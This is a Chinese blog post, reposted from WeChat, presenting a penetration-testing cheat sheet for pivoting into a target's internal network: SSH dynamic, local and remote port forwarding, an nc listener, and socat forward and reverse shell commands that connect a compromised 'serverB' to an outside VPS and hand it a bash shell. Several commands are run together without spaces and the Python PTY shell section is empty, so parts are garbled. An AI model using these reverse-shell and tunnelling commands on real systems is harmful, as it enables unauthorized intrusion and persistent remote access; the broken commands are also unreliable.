穿越邊界的姿勢(shì)

轉(zhuǎn)自:https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247484014&idx=1&sn=78fcbe24a3956ed1a0bf3fba594eb0d9&chksm=ec1e3246db69bb50949eef2218344c79ec94f2ec662729a924eb788a4a47747ba0dd3750c3dc&scene=21#wechat_redirect

利用ssh建立隧道

一、動(dòng)態(tài)端口轉(zhuǎn)發(fā)

ssh -D 用ssh做socks代理。假設(shè)你內(nèi)網(wǎng)里某臺(tái)機(jī)器可以上網(wǎng),但是你不能上網(wǎng),如果你有ssh到那臺(tái)機(jī)器的權(quán)限,那么就可以利用ssh方式建立一個(gè)代理socks5,通過(guò)代理來(lái)上網(wǎng)。

ssh -D[本地IP或省略]:[本地端口][登陸服務(wù)器的用戶名@服務(wù)器IP]-p[服務(wù)器ssh服務(wù)端口(默認(rèn)22)]

本地執(zhí)行命令:

ssh -D1080 root@106.22.50.48

效果:本地監(jiān)聽(tīng)1080端口,我們可以使用具有socks端口功能的應(yīng)用,可以通過(guò)代理:127.0.0.1:1080上網(wǎng),如果非要在目標(biāo)內(nèi)網(wǎng)使用,

可以在server B上執(zhí)行:

ssh -D 1080 root@10.3.1.6

這樣我們就可以通過(guò)server B的1080端口訪問(wèn)辦公網(wǎng)的資源。如果serverB的ssh可以訪問(wèn),

可以在本地執(zhí)行:

ssh -D1080 root@222.222.222.223

這樣我們就可以通過(guò)本地127.0.0.1:1080訪問(wèn)目標(biāo)內(nèi)網(wǎng)資源。

二、本地端口轉(zhuǎn)發(fā)

原理:將本地機(jī)(客戶機(jī))的某個(gè)端口轉(zhuǎn)發(fā)到遠(yuǎn)端指定機(jī)器的指定端口;本地端口轉(zhuǎn)發(fā)是在localhost上監(jiān)聽(tīng)一個(gè)端口,所有訪問(wèn)這個(gè)端口的數(shù)據(jù)都會(huì)通過(guò)ssh 隧道傳輸?shù)竭h(yuǎn)端的對(duì)應(yīng)端口。

在serverB上執(zhí)行:

ssh -L7001:localhost:7070root@106.22.50.48

作用:serverB監(jiān)聽(tīng)7001端口,并將7001端口的數(shù)據(jù)轉(zhuǎn)發(fā)到vps的7070端口

三、遠(yuǎn)程端口轉(zhuǎn)發(fā)

原理:將遠(yuǎn)程主機(jī)(服務(wù)器)的某個(gè)端口轉(zhuǎn)發(fā)到本地端指定機(jī)器的指定端口;遠(yuǎn)程端口轉(zhuǎn)發(fā)是在遠(yuǎn)程主機(jī)上監(jiān)聽(tīng)一個(gè)端口,所有訪問(wèn)遠(yuǎn)程服務(wù)器的指定端口的數(shù)據(jù)都會(huì)通過(guò)ssh 隧道傳輸?shù)奖镜氐膶?duì)應(yīng)端口。

在serverB上執(zhí)行:

localhost: ssh -R 3306:localhost:7070 root@10.3.1.6

作用:將10.3.1.6的3306端口轉(zhuǎn)發(fā)到serverB的7070端口,這樣我們?cè)谠L問(wèn)serverB的7070端口時(shí),其實(shí)訪問(wèn)到的是10.3.1.6的3306端口。

獲取一個(gè)shell窗口

Python PTY shell

使用nc在vps上用監(jiān)聽(tīng)4444端口:

nc -vv -l -p4444

在serverB上執(zhí)行:

socat

正向shell

vps上執(zhí)行監(jiān)聽(tīng)1337端口:

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

在serverB上執(zhí)行:

socat FILE:`tty`,raw,echo=0TCP:106.22.50.48:1337

反向shell

vps上執(zhí)行監(jiān)聽(tīng)1337:

socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0

在serverB上執(zhí)行:

socatTCP4:106.22.50.48:1337EXEC:bash,pty,stderr,setsid,sigint,sane

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • CA和證書安全協(xié)議(SSL/TLS)OpenSSH 一、CA和證書 (一) PKI(Public Key Infr...
    哈嘍別樣閱讀 1,520評(píng)論 0 0
  • 第一部分 概述當(dāng)你在咖啡館享受免費(fèi) WiFi 的時(shí)候,有沒(méi)有想到可能有人正在竊取你的密碼及隱私信息?當(dāng)你發(fā)現(xiàn)實(shí)驗(yàn)室...
    fastjrun閱讀 1,225評(píng)論 0 8
  • 實(shí)戰(zhàn) SSH 端口轉(zhuǎn)發(fā) 通過(guò)本文的介紹,讀者可以從中了解到如何應(yīng)用 SSH 端口轉(zhuǎn)發(fā)機(jī)制來(lái)解決日常工作 / 生活中...
    hopevow閱讀 1,098評(píng)論 0 9
  • 名詞延伸 通俗的說(shuō),域名就相當(dāng)于一個(gè)家庭的門牌號(hào)碼,別人通過(guò)這個(gè)號(hào)碼可以很容易的找到你。如果把IP地址比作一間房子...
    楊大蝦閱讀 20,806評(píng)論 2 56
  • 效果 物體受到標(biāo)簽為RigidBody的一切物體的萬(wàn)有引力,引力滿足距離平方反比規(guī)律。 用法 施加于被吸引的物體之...
    項(xiàng)羽拿破輪閱讀 2,527評(píng)論 0 0

友情鏈接更多精彩內(nèi)容